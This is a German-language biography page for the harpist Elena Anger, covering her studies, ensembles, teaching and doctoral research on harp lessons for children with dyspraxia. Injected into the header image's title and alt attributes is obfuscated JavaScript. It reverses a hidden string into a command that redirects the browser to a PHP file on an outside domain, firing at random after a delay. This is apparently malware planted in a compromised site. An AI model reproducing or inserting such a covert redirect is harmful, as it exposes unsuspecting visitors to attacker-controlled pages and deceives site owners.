<img src="https://elena-anger.com/wp-content/uploads/elementor/thumbs/Photo-header-scaled-pqwqa9hejis7h18qs5hykrtmy60l0ndo8dkbms07v4.jpeg" title="Pho$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to header" alt="Pho$mWn=function(n){if(typeof ($mWn.list[n])==" string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to header" />

Elena Anger erhielt ihren ersten Harfenunterricht mit fünf Jahren bei Aude Wetterwald. Sie studierte weiter bei Véronique Chenuet am Konservatorium in Angers (Frankreich), wo sie die Prüfungen für Harfe und Kammermusik abgeschlossen hat. 2010 gewann sie einen ersten Preis einstimmig beim Wettbewerb „Concours français de la Harpe“.

Parallel zu ihrem Musikstudium erwarb sie 2011 einen Bachelor in Moderner Literatur und Film an der Université Catholique de l’Ouest. Sie nimmt an verschiedenen kulturellen Projekten in ihrer Stadt teil, war unter anderem Mitglied der Studentenjury des Filmfestivals „Premiers Plans“ und spielte in einer Theateraufführung mit.

Elena entschied sich daraufhin für ein Musikstudium am Königlichen Konservatorium in Brüssel in der Klasse von Annie Lavoisier, wo sie 2014 einen Bachelor in Interpretation erhielt. Anschließend setzte sie ihr Musikstudium bei Godelieve Schrama an der Hochschule für Musik in Detmold (Nordrhein) fort, wo sie 2017 einen Masterabschluss als Solistin und Orchester und 2020 einen Masterabschluss in Instrumentalpädagogik erhielt. Außerdem bildete sie sich viele Jahre lang bei Germaine Lorenzini weiter.

Elena tritt in verschiedenen Kammermusikensembles (Astréos Duo Flöte und Harfe, Artémis Duo Sopran und Harfe) und Orchestern auf, die sie auch auf Reisen führten. Sie wirkte zweimal im Orchestre de la Francophonie in Quebec mit und nahm mit dem Orchester Cuban-European Youth Academy an den Festivals Rheingau Musik Festival und Young Euro Classic teil. Sie war Mitglied des Detmolder Kammerorchesters und spielte mehrfach mit professionellen Orchestern in Deutschland oder Québec.

Elena ist seit vielen Jahren leidenschaftliche Lehrerin und hat ihre Leidenschaft an zahlreiche Harfenschüler aller Altersstufen und Niveaus weitergegeben; sie bietet regelmäßig Bildungskonzerte, Kindervorstellungen und Instrumentenvorstellungen an. Da ihr die Zugänglichkeit der Musikerziehung für alle Bevölkerungsgruppen besonders am Herzen liegt, führt sie derzeit ein Forschungsprojekt im Rahmen ihrer Doktorarbeit in Musikerziehung an der Université Laval (Québec) unter der Leitung von Jonathan Bolduc durch, um die Auswirkungen des Harfenunterrichts bei Kindern mit Dyspraxie zu untersuchen und entsprechende Lehrmittel zu entwickeln.

Außerdem hat sie eine Harfenlernmethode für Kinder im Anfängeralter verfasst, die in Kürze erhältlich sein wird.